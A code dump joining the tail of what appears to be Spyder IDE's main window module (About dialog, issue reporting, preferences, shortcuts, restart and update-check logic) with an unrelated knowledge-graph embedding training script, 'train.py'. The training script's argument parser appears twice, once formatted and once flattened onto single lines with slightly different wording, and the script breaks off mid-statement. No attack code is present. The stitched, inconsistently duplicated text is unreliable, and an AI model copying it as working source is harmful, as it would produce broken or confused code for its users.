Qt.WindowStaysOnTopHint) screen_number = QDesktopWidget().screenNumber(self) if screen_number < 0: screen_number = 0 r = QApplication.desktop().screenGeometry(screen_number) self.setGeometry( r.left() - 1, r.top() - 1, r.width() + 2, r.height() + 2) self.showNormal() else: self.showFullScreen() self.__update_fullscreen_action() def add_to_toolbar(self, toolbar, widget): """Add widget actions to toolbar""" actions = widget.toolbar_actions if actions is not None: add_actions(toolbar, actions) @Slot() def about(self): """Create About Spyder dialog with general information.""" versions = get_versions() # Show Git revision for development version revlink = '' if versions['revision']: rev = versions['revision'] revlink = " (<a href='https://github.com/spyder-ide/spyder/"\ "commit/%s'>Commit: %s</a>)" % (rev, rev) msgBox = QMessageBox(self) msgBox.setText( """ <b>Spyder {spyder_ver}</b> {revision} <br>The Scientific Python Development Environment | <a href="{website_url}">Spyder-IDE.org</a> <br>Copyright &copy; 2009-2019 Spyder Project Contributors and <a href="{github_url}/blob/master/AUTHORS.txt">others</a> <br>Distributed under the terms of the <a href="{github_url}/blob/master/LICENSE.txt">MIT License</a>. 
<p>Created by Pierre Raybaut; current maintainer is Carlos Cordoba. <br>Developed by the <a href="{github_url}/graphs/contributors">international Spyder community</a>. <br>Many thanks to all the Spyder beta testers and dedicated users. <p>For help with Spyder errors and crashes, please read our <a href="{trouble_url}">Troubleshooting Guide</a>, and for bug reports and feature requests, visit our <a href="{github_url}">Github site</a>. For project discussion, see our <a href="{forum_url}">Google Group</a>. <p>This project is part of a larger effort to promote and facilitate the use of Python for scientific and engineering software development. The popular Python distributions <a href="https://www.anaconda.com/download/">Anaconda</a> and <a href="https://winpython.github.io/">WinPython</a> also contribute to this plan. <p>Python {python_ver} {bitness}-bit | Qt {qt_ver} | {qt_api} {qt_api_ver} | {os_name} {os_ver} <small><p>Certain source files under other compatible permissive licenses and/or originally by other authors. Spyder 3 theme icons derived from <a href="https://fontawesome.com/">Font Awesome</a> 4.7 (&copy; 2016 David Gandy; SIL OFL 1.1) and <a href="http://materialdesignicons.com/">Material Design</a> (&copy; 2014 Austin Andrews; SIL OFL 1.1). Most Spyder 2 theme icons sourced from the <a href="https://www.everaldo.com">Crystal Project iconset</a> (&copy; 2006-2007 Everaldo Coelho; LGPL 2.1+). Other icons from <a href="http://p.yusukekamiyamane.com/">Yusuke Kamiyamane</a> (&copy; 2013 Yusuke Kamiyamane; CC-BY 3.0), the <a href="http://www.famfamfam.com/lab/icons/silk/">FamFamFam Silk icon set</a> 1.3 (&copy; 2006 Mark James; CC-BY 2.5), and the <a href="https://www.kde.org/">KDE Oxygen icons</a> (&copy; 2007 KDE Artists; LGPL 3.0+).</small> <p>See the <a href="{github_url}/blob/master/NOTICE.txt">NOTICE</a> file for full legal information. """ .format(spyder_ver=versions['spyder'], revision=revlink, website_url=__website_url__, github_url=__project_url__, trouble_url=__trouble_url__, forum_url=__forum_url__, python_ver=versions['python'], bitness=versions['bitness'], qt_ver=versions['qt'], qt_api=versions['qt_api'], qt_api_ver=versions['qt_api_ver'], os_name=versions['system'], os_ver=versions['release']) ) msgBox.setWindowTitle(_("About %s") % "Spyder") msgBox.setStandardButtons(QMessageBox.Ok) from spyder.config.gui import is_dark_interface if PYQT5: if is_dark_interface(): icon_filename = "spyder.svg" else: icon_filename = "spyder_dark.svg" else: if is_dark_interface(): icon_filename = "spyder.png" else: icon_filename = "spyder_dark.png" app_icon = QIcon(get_image_path(icon_filename)) msgBox.setIconPixmap(app_icon.pixmap(QSize(64, 64))) msgBox.setTextInteractionFlags( Qt.LinksAccessibleByMouse | Qt.TextSelectableByMouse) msgBox.exec_() @Slot() def show_dependencies(self): """Show Spyder's Dependencies dialog box""" from spyder.widgets.dependencies import DependenciesDialog dlg = DependenciesDialog(self) dlg.set_data(dependencies.DEPENDENCIES) dlg.exec_() def render_issue(self, description='', traceback=''): """Render issue before sending it to Github""" # Get component versions versions = get_versions() # Get git revision for development version revision = '' if versions['revision']: revision = versions['revision'] # Make a description header in case no description is supplied if not description: description = "### What steps reproduce the problem?" 
# Make error section from traceback and add appropriate reminder header if traceback: error_section = ("### Traceback\n" "```python-traceback\n" "{}\n" "```".format(traceback)) else: error_section = '' issue_template = """\ ## Description {description} {error_section} ## Versions * Spyder version: {spyder_version} {commit} * Python version: {python_version} * Qt version: {qt_version} * {qt_api_name} version: {qt_api_version} * Operating System: {os_name} {os_version} ### Dependencies ``` {dependencies} ``` """.format(description=description, error_section=error_section, spyder_version=versions['spyder'], commit=revision, python_version=versions['python'], qt_version=versions['qt'], qt_api_name=versions['qt_api'], qt_api_version=versions['qt_api_ver'], os_name=versions['system'], os_version=versions['release'], dependencies=dependencies.status()) return issue_template @Slot() def report_issue(self, body=None, title=None, open_webpage=False): """Report a Spyder issue to github, generating body text if needed.""" if body is None: from spyder.widgets.reporterror import SpyderErrorDialog report_dlg = SpyderErrorDialog(self, is_report=True) report_dlg.show() else: if open_webpage: if PY3: from urllib.parse import quote else: from urllib import quote # analysis:ignore from qtpy.QtCore import QUrlQuery url = QUrl(__project_url__ + '/issues/new') query = QUrlQuery() query.addQueryItem("body", quote(body)) if title: query.addQueryItem("title", quote(title)) url.setQuery(query) QDesktopServices.openUrl(url) @Slot() def trouble_guide(self): """Open Spyder troubleshooting guide in a web browser.""" url = QUrl(__trouble_url__) QDesktopServices.openUrl(url) @Slot() def google_group(self): """Open Spyder Google Group in a web browser.""" url = QUrl(__forum_url__) QDesktopServices.openUrl(url) @Slot() def global_callback(self): """Global callback""" widget = QApplication.focusWidget() action = self.sender() callback = from_qvariant(action.data(), to_text_string) from spyder.plugins.editor.widgets.editor import TextEditBaseWidget from spyder.plugins.ipythonconsole.widgets import ControlWidget if isinstance(widget, (TextEditBaseWidget, ControlWidget)): getattr(widget, callback)() else: return def redirect_internalshell_stdio(self, state): if state: self.console.shell.interpreter.redirect_stds() else: self.console.shell.interpreter.restore_stds() def open_external_console(self, fname, wdir, args, interact, debug, python, python_args, systerm, post_mortem=False): """Open external console""" if systerm: # Running script in an external system terminal try: if CONF.get('main_interpreter', 'default'): executable = get_python_executable() else: executable = CONF.get('main_interpreter', 'executable') programs.run_python_script_in_terminal( fname, wdir, args, interact, debug, python_args, executable) except NotImplementedError: QMessageBox.critical(self, _("Run"), _("Running an external system terminal " "is not supported on platform %s." ) % os.name) def execute_in_external_console(self, lines, focus_to_editor): """ Execute lines in IPython console and eventually set focus to the Editor. """ console = self.ipyconsole console.switch_to_plugin() console.execute_code(lines) if focus_to_editor: self.editor.switch_to_plugin() def open_file(self, fname, external=False): """ Open filename with the appropriate application Redirect to the right widget (txt -> editor, spydata -> workspace, ...) 
or open file outside Spyder (if extension is not supported) """ fname = to_text_string(fname) ext = osp.splitext(fname)[1] if encoding.is_text_file(fname): self.editor.load(fname) elif self.variableexplorer is not None and ext in IMPORT_EXT: self.variableexplorer.import_data(fname) elif not external: fname = file_uri(fname) programs.start_file(fname) def open_external_file(self, fname): """ Open external files that can be handled either by the Editor or the variable explorer inside Spyder. """ fname = encoding.to_unicode_from_fs(fname) if osp.isfile(fname): self.open_file(fname, external=True) elif osp.isfile(osp.join(CWD, fname)): self.open_file(osp.join(CWD, fname), external=True) # ---- PYTHONPATH management, etc. def get_spyder_pythonpath(self): """Return Spyder PYTHONPATH""" active_path = [p for p in self.path if p not in self.not_active_path] return active_path + self.project_path def add_path_to_sys_path(self): """Add Spyder path to sys.path""" for path in reversed(self.get_spyder_pythonpath()): sys.path.insert(1, path) def remove_path_from_sys_path(self): """Remove Spyder path from sys.path""" for path in self.path + self.project_path: while path in sys.path: sys.path.remove(path) @Slot() def path_manager_callback(self): """Spyder path manager""" from spyder.widgets.pathmanager import PathManager self.remove_path_from_sys_path() project_path = self.projects.get_pythonpath() dialog = PathManager(self, self.path, project_path, self.not_active_path, sync=True) dialog.redirect_stdio.connect(self.redirect_internalshell_stdio) dialog.exec_() self.add_path_to_sys_path() try: encoding.writelines(self.path, self.SPYDER_PATH) # Saving path encoding.writelines(self.not_active_path, self.SPYDER_NOT_ACTIVE_PATH) except EnvironmentError: pass self.sig_pythonpath_changed.emit() def pythonpath_changed(self): """Projects PYTHONPATH contribution has changed""" self.remove_path_from_sys_path() self.project_path = self.projects.get_pythonpath() self.add_path_to_sys_path() self.sig_pythonpath_changed.emit() @Slot() def win_env(self): """Show Windows current user environment variables""" self.dialog_manager.show(WinUserEnvDialog(self)) #---- Preferences def apply_settings(self): """Apply settings changed in 'Preferences' dialog box""" qapp = QApplication.instance() # Set 'gtk+' as the default theme in Gtk-based desktops # Fixes Issue 2036 if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()): try: qapp.setStyle('gtk+') except: pass else: style_name = CONF.get('appearance', 'windows_style', self.default_style) style = QStyleFactory.create(style_name) if style is not None: style.setProperty('name', style_name) qapp.setStyle(style) default = self.DOCKOPTIONS if CONF.get('main', 'vertical_tabs'): default = default|QMainWindow.VerticalTabs if CONF.get('main', 'animated_docks'): default = default|QMainWindow.AnimatedDocks self.setDockOptions(default) self.apply_panes_settings() self.apply_statusbar_settings() if CONF.get('main', 'use_custom_cursor_blinking'): qapp.setCursorFlashTime(CONF.get('main', 'custom_cursor_blinking')) else: qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT) def apply_panes_settings(self): """Update dockwidgets features settings""" for plugin in (self.widgetlist + self.thirdparty_plugins): features = plugin.FEATURES if CONF.get('main', 'vertical_dockwidget_titlebars'): features = features | QDockWidget.DockWidgetVerticalTitleBar plugin.dockwidget.setFeatures(features) plugin.update_margins() def apply_statusbar_settings(self): """Update status bar widgets settings""" 
show_status_bar = CONF.get('main', 'show_status_bar') self.statusBar().setVisible(show_status_bar) if show_status_bar: for widget, name in ((self.mem_status, 'memory_usage'), (self.cpu_status, 'cpu_usage')): if widget is not None: widget.setVisible(CONF.get('main', '%s/enable' % name)) widget.set_interval(CONF.get('main', '%s/timeout' % name)) else: return @Slot() def edit_preferences(self): """Edit Spyder preferences""" from spyder.preferences.configdialog import ConfigDialog dlg = ConfigDialog(self) dlg.size_change.connect(self.set_prefs_size) if self.prefs_dialog_size is not None: dlg.resize(self.prefs_dialog_size) for PrefPageClass in self.general_prefs: widget = PrefPageClass(dlg, main=self) widget.initialize() dlg.add_page(widget) for plugin in [self.workingdirectory, self.editor, self.projects, self.ipyconsole, self.historylog, self.help, self.variableexplorer, self.onlinehelp, self.explorer, self.findinfiles ]+self.thirdparty_plugins: if plugin is not None: try: widget = plugin.create_configwidget(dlg) if widget is not None: dlg.add_page(widget) except Exception: traceback.print_exc(file=sys.stderr) if self.prefs_index is not None: dlg.set_current_index(self.prefs_index) dlg.show() dlg.check_all_settings() dlg.pages_widget.currentChanged.connect(self.__preference_page_changed) dlg.exec_() def __preference_page_changed(self, index): """Preference page index has changed""" self.prefs_index = index def set_prefs_size(self, size): """Save preferences dialog size""" self.prefs_dialog_size = size #---- Shortcuts def register_shortcut(self, qaction_or_qshortcut, context, name, add_sc_to_tip=False): """ Register QAction or QShortcut to Spyder main application, with shortcut (context, name, default) """ self.shortcut_data.append( (qaction_or_qshortcut, context, name, add_sc_to_tip) ) def apply_shortcuts(self): """Apply shortcuts settings to all widgets/plugins""" toberemoved = [] for index, (qobject, context, name, add_sc_to_tip) in enumerate(self.shortcut_data): keyseq = QKeySequence( get_shortcut(context, name) ) try: if isinstance(qobject, QAction): if sys.platform == 'darwin' and \ qobject._shown_shortcut == 'missing': qobject._shown_shortcut = keyseq else: qobject.setShortcut(keyseq) if add_sc_to_tip: add_shortcut_to_tooltip(qobject, context, name) elif isinstance(qobject, QShortcut): qobject.setKey(keyseq) except RuntimeError: # Object has been deleted toberemoved.append(index) for index in sorted(toberemoved, reverse=True): self.shortcut_data.pop(index) @Slot() def show_shortcuts_dialog(self): from spyder.widgets.shortcutssummary import ShortcutsSummaryDialog dlg = ShortcutsSummaryDialog(None) dlg.exec_() # -- Open files server def start_open_files_server(self): self.open_files_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) port = select_port(default_port=OPEN_FILES_PORT) CONF.set('main', 'open_files_port', port) self.open_files_server.bind(('127.0.0.1', port)) self.open_files_server.listen(20) while 1: # 1 is faster than True try: req, dummy = self.open_files_server.accept() except socket.error as e: # See Issue 1275 for details on why errno EINTR is # silently ignored here. 
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR # To avoid a traceback after closing on Windows if e.args[0] == eintr: continue # handle a connection abort on close error enotsock = (errno.WSAENOTSOCK if os.name == 'nt' else errno.ENOTSOCK) if e.args[0] in [errno.ECONNABORTED, enotsock]: return raise fname = req.recv(1024) fname = fname.decode('utf-8') self.sig_open_external_file.emit(fname) req.sendall(b' ') # ---- Quit and restart, and reset spyder defaults @Slot() def reset_spyder(self): """ Quit and reset Spyder and then Restart application. """ answer = QMessageBox.warning(self, _("Warning"), _("Spyder will restart and reset to default settings: <br><br>" "Do you want to continue?"), QMessageBox.Yes | QMessageBox.No) if answer == QMessageBox.Yes: self.restart(reset=True) @Slot() def restart(self, reset=False): """ Quit and Restart Spyder application. If reset True it allows to reset spyder on restart. """ # Get start path to use in restart script spyder_start_directory = get_module_path('spyder') restart_script = osp.join(spyder_start_directory, 'app', 'restart.py') # Get any initial argument passed when spyder was started # Note: Variables defined in bootstrap.py and spyder/app/start.py env = os.environ.copy() bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None) spyder_args = env.pop('SPYDER_ARGS') # Get current process and python running spyder pid = os.getpid() python = sys.executable # Check if started with bootstrap.py if bootstrap_args is not None: spyder_args = bootstrap_args is_bootstrap = True else: is_bootstrap = False # Pass variables as environment variables (str) to restarter subprocess env['SPYDER_ARGS'] = spyder_args env['SPYDER_PID'] = str(pid) env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap) env['SPYDER_RESET'] = str(reset) if DEV: if os.name == 'nt': env['PYTHONPATH'] = ';'.join(sys.path) else: env['PYTHONPATH'] = ':'.join(sys.path) # Build the command and popen arguments depending on the OS if os.name == 'nt': # Hide flashing command prompt startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW shell = False else: startupinfo = None shell = True command = '"{0}" "{1}"' command = command.format(python, restart_script) try: if self.closing(True): subprocess.Popen(command, shell=shell, env=env, startupinfo=startupinfo) self.console.quit() except Exception as error: # If there is an error with subprocess, Spyder should not quit and # the error can be inspected in the internal console print(error) # spyder: test-skip print(command) # spyder: test-skip # ---- Interactive Tours def show_tour(self, index): """Show interactive tour.""" self.maximize_dockwidget(restore=True) frames = self.tours_available[index] self.tour.set_tour(index, frames, self) self.tour.start_tour() # ---- Global File Switcher def open_fileswitcher(self, symbol=False): """Open file list management dialog box.""" if self.fileswitcher is not None and \ self.fileswitcher.is_visible: self.fileswitcher.hide() self.fileswitcher.is_visible = False return if symbol: self.fileswitcher.plugin = self.editor self.fileswitcher.set_search_text('@') else: self.fileswitcher.set_search_text('') self.fileswitcher.show() self.fileswitcher.is_visible = True def open_symbolfinder(self): """Open symbol list management dialog box.""" self.open_fileswitcher(symbol=True) def add_to_fileswitcher(self, plugin, tabs, data, icon): """Add a plugin to the File Switcher.""" if self.fileswitcher is None: self.fileswitcher = FileSwitcher(self, plugin, tabs, data, icon) else: 
self.fileswitcher.add_plugin(plugin, tabs, data, icon) self.fileswitcher.sig_goto_file.connect( plugin.get_current_tab_manager().set_stack_index) # ---- Check for Spyder Updates def _check_updates_ready(self): """Called by WorkerUpdates when ready""" from spyder.widgets.helperwidgets import MessageCheckBox # feedback` = False is used on startup, so only positive feedback is # given. `feedback` = True is used when after startup (when using the # menu action, and gives feeback if updates are, or are not found. feedback = self.give_updates_feedback # Get results from worker update_available = self.worker_updates.update_available latest_release = self.worker_updates.latest_release error_msg = self.worker_updates.error url_r = __project_url__ + '/releases' url_i = 'https://docs.spyder-ide.org/installation.html' # Define the custom QMessageBox box = MessageCheckBox(icon=QMessageBox.Information, parent=self) box.setWindowTitle(_("Spyder updates")) box.set_checkbox_text(_("Check for updates on startup")) box.setStandardButtons(QMessageBox.Ok) box.setDefaultButton(QMessageBox.Ok) # Adjust the checkbox depending on the stored configuration section, option = 'main', 'check_updates_on_startup' check_updates = CONF.get(section, option) box.set_checked(check_updates) if error_msg is not None: msg = error_msg box.setText(msg) box.set_check_visible(False) box.exec_() check_updates = box.is_checked() else: if update_available: anaconda_msg = '' if 'Anaconda' in sys.version or 'conda-forge' in sys.version: anaconda_msg = _("<hr><b>IMPORTANT NOTE:</b> It seems " "that you are using Spyder with " "<b>Anaconda/Miniconda</b>. Please " "<b>don't</b> use <code>pip</code> to " "update it as that will probably break " "your installation.<br><br>" "Instead, please wait until new conda " "packages are available and use " "<code>conda</code> to perform the " "update.<hr>") msg = _("<b>Spyder %s is available!</b> <br><br>Please use " "your package manager to update Spyder or go to our " "<a href=\"%s\">Releases</a> page to download this " "new version. <br><br>If you are not sure how to " "proceed to update Spyder please refer to our " " <a href=\"%s\">Installation</a> instructions." "") % (latest_release, url_r, url_i) msg += '<br>' + anaconda_msg box.setText(msg) box.set_check_visible(True) box.exec_() check_updates = box.is_checked() elif feedback: msg = _("Spyder is up to date.") box.setText(msg) box.set_check_visible(False) box.exec_() check_updates = box.is_checked() # Update checkbox based on user interaction CONF.set(section, option, check_updates) # Enable check_updates_action after the thread has finished self.check_updates_action.setDisabled(False) # Provide feeback when clicking menu if check on startup is on self.give_updates_feedback = True @Slot() def check_updates(self, startup=False): """ Check for spyder updates on github releases using a QThread. 
""" from spyder.workers.updates import WorkerUpdates # Disable check_updates_action while the thread is working self.check_updates_action.setDisabled(True) if self.thread_updates is not None: self.thread_updates.terminate() self.thread_updates = QThread(self) self.worker_updates = WorkerUpdates(self, startup=startup) self.worker_updates.sig_ready.connect(self._check_updates_ready) self.worker_updates.sig_ready.connect(self.thread_updates.quit) self.worker_updates.moveToThread(self.thread_updates) self.thread_updates.started.connect(self.worker_updates.start) self.thread_updates.start() # --- For OpenGL def _test_setting_opengl(self, option): """Get the current OpenGL implementation in use""" if option == 'software': return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL) elif option == 'desktop': return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL) elif option == 'gles': return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES) #============================================================================== # Utilities to create the 'main' function #============================================================================== def initialize(): """Initialize Qt, patching sys.exit and eventually setting up ETS""" # This doesn't create our QApplication, just holds a reference to # MAIN_APP, created above to show our splash screen as early as # possible app = qapplication() # --- Set application icon app.setWindowIcon(APP_ICON) #----Monkey patching QApplication class FakeQApplication(QApplication): """Spyder's fake QApplication""" def __init__(self, args): self = app # analysis:ignore @staticmethod def exec_(): """Do nothing because the Qt mainloop is already running""" pass from qtpy import QtWidgets QtWidgets.QApplication = FakeQApplication # ----Monkey patching sys.exit def fake_sys_exit(arg=[]): pass sys.exit = fake_sys_exit # ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+ if PYQT5: def spy_excepthook(type_, value, tback): sys.__excepthook__(type_, value, tback) sys.excepthook = spy_excepthook # Removing arguments from sys.argv as in standard Python interpreter sys.argv = [''] # Selecting Qt4 backend for Enthought Tool Suite (if installed) try: from enthought.etsconfig.api import ETSConfig ETSConfig.toolkit = 'qt4' except ImportError: pass return app class Spy(object): """ Inspect Spyder internals Attributes: app Reference to main QApplication object window Reference to spyder.MainWindow widget """ def __init__(self, app, window): self.app = app self.window = window def __dir__(self): return list(self.__dict__.keys()) +\ [x for x in dir(self.__class__) if x[0] != '_'] def versions(self): return get_versions() def run_spyder(app, options, args): """ Create and show Spyder's main window Start QApplication event loop """ #TODO: insert here # Main window main = MainWindow(options) try: main.setup() except BaseException: if main.console is not None: try: main.console.shell.exit_interpreter() except BaseException: pass raise main.show() main.post_visible_setup() if main.console: main.console.shell.interpreter.namespace['spy'] = \ Spy(app=app, window=main) # Open external files passed as args if args: for a in args: main.open_external_file(a) # Don't show icons in menus for Mac if sys.platform == 'darwin': QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True) # Open external files with our Mac app if running_in_mac_app(): app.sig_open_external_file.connect(main.open_external_file) # To give focus again to the last focused widget after restoring # the 
window app.focusChanged.connect(main.change_last_focused_widget) if not running_under_pytest(): app.exec_() return main #============================================================================== # Main #============================================================================== def main(): """Main function""" # **** For Pytest **** # We need to create MainWindow **here** to avoid passing pytest # options to Spyder if running_under_pytest(): try: from unittest.mock import Mock except ImportError: from mock import Mock # Python 2 options = Mock() options.working_directory = None options.profile = False options.multithreaded = False options.new_instance = False options.project = None options.window_title = None options.opengl_implementation = None options.debug_info = None options.debug_output = None if CONF.get('main', 'opengl') != 'automatic': option = CONF.get('main', 'opengl') set_opengl_implementation(option) app = initialize() window = run_spyder(app, options, None) return window # **** Collect command line options **** # Note regarding Options: # It's important to collect options before monkey patching sys.exit, # otherwise, argparse won't be able to exit if --help option is passed options, args = get_options() # **** Set OpenGL implementation to use **** if options.opengl_implementation: option = options.opengl_implementation set_opengl_implementation(option) else: if CONF.get('main', 'opengl') != 'automatic': option = CONF.get('main', 'opengl') set_opengl_implementation(option) # **** Handle hide_console option **** if options.show_console: print("(Deprecated) --show console does nothing, now the default " " behavior is to show the console, use --hide-console if you " "want to hide it") if set_attached_console_visible is not None: set_attached_console_visible(not options.hide_console or options.reset_config_files or options.reset_to_defaults or options.optimize or bool(get_debug_level())) # **** Set debugging info **** setup_logging(options) # **** Create the application **** app = initialize() # **** Handle other options **** if options.reset_config_files: # <!> Remove all configuration files! reset_config_files() return elif options.reset_to_defaults: # Reset Spyder settings to defaults CONF.reset_to_defaults(save=True) return elif options.optimize: # Optimize the whole Spyder's source code directory import spyder programs.run_python_script(module="compileall", args=[spyder.__path__[0]], p_args=['-O']) return # **** Show crash dialog **** if CONF.get('main', 'crash', False) and not DEV: CONF.set('main', 'crash', False) if SPLASH is not None: SPLASH.hide() QMessageBox.information( None, "Spyder", "Spyder crashed during last session.<br><br>" "If Spyder does not start at all and <u>before submitting a " "bug report</u>, please try to reset settings to defaults by " "running Spyder with the command line option '--reset':<br>" "<span style=\'color: #555555\'><b>spyder --reset</b></span>" "<br><br>" "<span style=\'color: #ff5555\'><b>Warning:</b></span> " "this command will remove all your Spyder configuration files " "located in '%s').<br><br>" "If Spyder still fails to launch, you should consult our " "comprehensive <b><a href=\"%s\">Troubleshooting Guide</a></b>, " "which when followed carefully solves the vast majority of " "crashes; also, take " "the time to search for <a href=\"%s\">known bugs</a> or " "<a href=\"%s\">discussions</a> matching your situation before " "submitting a report to our <a href=\"%s\">issue tracker</a>. 
" "Your feedback will always be greatly appreciated." "" % (get_conf_path(), __trouble_url__, __project_url__, __forum_url__, __project_url__)) # **** Create main window **** mainwindow = None try: mainwindow = run_spyder(app, options, args) except FontError as fontError: QMessageBox.information(None, "Spyder", "Spyder was unable to load the <i>Spyder 3</i> " "icon theme. That's why it's going to fallback to the " "theme used in Spyder 2.<br><br>" "For that, please close this window and start Spyder again.") CONF.set('appearance', 'icon_theme', 'spyder 2') except BaseException: CONF.set('main', 'crash', True) import traceback traceback.print_exc(file=STDERR) traceback.print_exc(file=open('spyder_crash.log', 'w')) if mainwindow is None: # An exception occured if SPLASH is not None: SPLASH.hide() return ORIGINAL_SYS_EXIT() if __name__ == "__main__": main()
train.py
# -*- coding: utf-8 -*-
#
# train.py
#
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ******************************
# NOTICE
# This file was modified by Vardaan Pahuja for this project (email: pahuja.9@osu.edu)
# ******************************

import math
import os
import logging
import logging.handlers
import time
import numpy as np
from multiprocessing import set_start_method
from tqdm import tqdm
import subprocess
import joblib
import dgl

from dataloader import EvalDataset, TrainDataset, TrainDatasetNameGraph, NewBidirectionalOneShotIterator
from dataloader import get_dataset
from utils import get_compatible_batch_size, save_model, CommonArgParser
from wiki2vec.dictionary import Dictionary

backend = os.environ.get('DGLBACKEND', 'pytorch')

import torch.multiprocessing as mp
from train_pytorch import load_model
from train_pytorch import train_ke, train_mp_ke
from train_pytorch import test, test_mp
# import dist_train
from skipGramModel import *
from torch import optim
import json
import multiprocessing
import random


class ArgParser(CommonArgParser):
    def __init__(self):
        super(ArgParser, self).__init__()

        self.add_argument('--gpu', type=int, default=[-1], nargs='+',
                          help='A list of gpu ids, e.g. 0 1 2 4')
        self.add_argument("--cuda", action='store_true', default=False,
                          help="enable cuda")
        self.add_argument('--mix_cpu_gpu', action='store_true',
                          help='Training a knowledge graph embedding model with both CPUs and GPUs.'\
                               'The embeddings are stored in CPU memory and the training is performed in GPUs.'\
                               'This is usually used for training a large knowledge graph embeddings.')
        self.add_argument('--valid', action='store_true',
                          help='Evaluate the model on the validation set in the training.')
        self.add_argument('--rel_part', action='store_true',
                          help='Enable relation partitioning for multi-GPU training.')
        self.add_argument('--async_update', action='store_true',
                          help='Allow asynchronous update on node embedding for multi-GPU training.'\
                               'This overlaps CPU and GPU computation to speed up.')
        self.add_argument('--dump-db-file', type=str, required=True,
                          help='name of output db file')
        self.add_argument('--dictionary-file', type=str, required=True,
                          help='name of dictionary file')
        self.add_argument('--mention-db-file', type=str, required=True,
                          help='name of mention db file')
        self.add_argument('--link-graph-file', type=str, default=None,
                          help='name of link graph file')
        self.add_argument('--entities-per-page', type=int, default=10,
                          help='For processing each page, the '
                               'specified number of randomly chosen entities are used to predict their '
                               'neighboring entities in the link graph')
        self.add_argument('--window', type=int, default=5,
                          help='size of window for skip-gram')
        self.add_argument('--negative', type=int, default=15,
                          help='no. of negatives for skip-gram')
        self.add_argument('--sg_batch_size', type=int, default=100,
                          help='batch size for skip gram model')
        self.add_argument('--sg_lr', type=float, default=0.025,
                          help='learning rate for skip gram model')  # TODO: check LR initial value
        self.add_argument("--sample", type=float, default=1e-4,
                          help="subsample threshold")
        self.add_argument('--num_proc_train', type=int, default=-1,
                          help='no. of training CPU/GPU proc.')
        # self.add_argument("--sg_iters", type=int, default=5, help="no. of iters of SG model")
        self.add_argument("--n_iters", type=int, default=5,
                          help="no. of iters of combined model")
        self.add_argument("--timeout", type=int, default=1000,
                          help="time (in sec.) to wait for incoming data batches before exiting training")
        self.add_argument("--balance_param", type=float, default=100.0,
                          help="value of balance parameter")
        self.add_argument("--seed", type=int, default=11117)
        self.add_argument("--transe-entity-ckpt-path", type=str, default=None)
        self.add_argument("--transe-relation-ckpt-path", type=str, default=None)
        self.add_argument("--sg-ckpt-emb0-path", type=str, default=None)
        self.add_argument("--sg-ckpt-emb1-path", type=str, default=None)
        self.add_argument("--reg-loss-start-epoch", type=int, default=1)
        self.add_argument("--use-input-embedding", action='store_true', default=False)
        self.add_argument("--start-epoch", type=int, default=0)
        self.add_argument("--proj-layer-ckpt-path", type=str, default=None)
        self.add_argument("--sg-reg-optimizer", type=str, choices=['sgd', 'adam'])
        self.add_argument("--kb-process-method", type=str, choices=['forkserver', 'fork'], default='fork')
        self.add_argument('--wiki-link-file', type=str, required=True,
                          help='path to wikipedia links file')
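
# Usage note (illustrative only; the file names below are hypothetical and the options
# inherited from CommonArgParser are omitted): the required flags above mean a typical
# launch looks roughly like
#   python train.py --dump-db-file dump.db --dictionary-file dictionary.pkl \
#       --mention-db-file mention.db --wiki-link-file wiki_links.json ...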
of negatives for skip-gram') self.add_argument('--sg_batch_size', type=int, default=100, help='batch size for skip gram model') self.add_argument('--sg_lr', type=float, default=0.025, help='learning rate for skip gram model') #TODO: check LR initial value self.add_argument("--sample", type=float, default=1e-4, help="subsample threshold") self.add_argument('--num_proc_train', type=int, default=-1, help='no. of training CPU/GPU proc.') # self.add_argument("--sg_iters", type=int, default=5, help="no. of iters of SG model") self.add_argument("--n_iters", type=int, default=5, help="no. of iters of combined model") self.add_argument("--timeout", type=int, default=1000, help="time (in sec.) to wait before for incoming data batches before exiting training") self.add_argument("--balance_param", type=float, default=100.0, help="value of balance parameter") self.add_argument("--seed", type=int, default=11117) self.add_argument("--transe-entity-ckpt-path", type=str, default=None) self.add_argument("--transe-relation-ckpt-path", type=str, default=None) self.add_argument("--sg-ckpt-emb0-path", type=str, default=None) self.add_argument("--sg-ckpt-emb1-path", type=str, default=None) self.add_argument("--reg-loss-start-epoch", type=int, default=1) self.add_argument("--use-input-embedding", action='store_true', default=False) self.add_argument("--start-epoch", type=int, default=0) self.add_argument("--proj-layer-ckpt-path", type=str, default=None) self.add_argument("--sg-reg-optimizer", type=str, choices=['sgd', 'adam']) self.add_argument("--kb-process-method", type=str, choices=['forkserver', 'fork'], default='fork') self.add_argument('--wiki-link-file', type=str, required=True, help='path to wikipedia links file') def listener(q, args): '''listens for messages on the q, writes to file. ''' if args.start_epoch==0: loss_log_file = os.path.join(args.save_path, 'train_loss.log') else: loss_log_file = os.path.join(args.save_path, 'train_loss_{}.log'.format(args.start_epoch)) with open(loss_log_file, 'w') as f: log_id = 0 while 1: m = q.get() if m == 'kill': f.write('end of log') f.flush() break f.write(str(m) + '\n') if log_id % 1000 == 0: f.flush() log_id += 1 def main(): args = ArgParser().parse_args() print(args.use_input_embedding) # set seed torch.manual_seed(args.seed) np.random.seed(args.seed) random.seed(args.seed) dgl.random.seed(args.seed) logging.basicConfig(format='%(name)s - %(message)s', level=logging.INFO) logger = multiprocessing.get_logger() logger.warning('This will get logged to a file') # queue for log messages manager = mp.Manager() log_queue = manager.Queue() listener_process = multiprocessing.Process(target=listener, 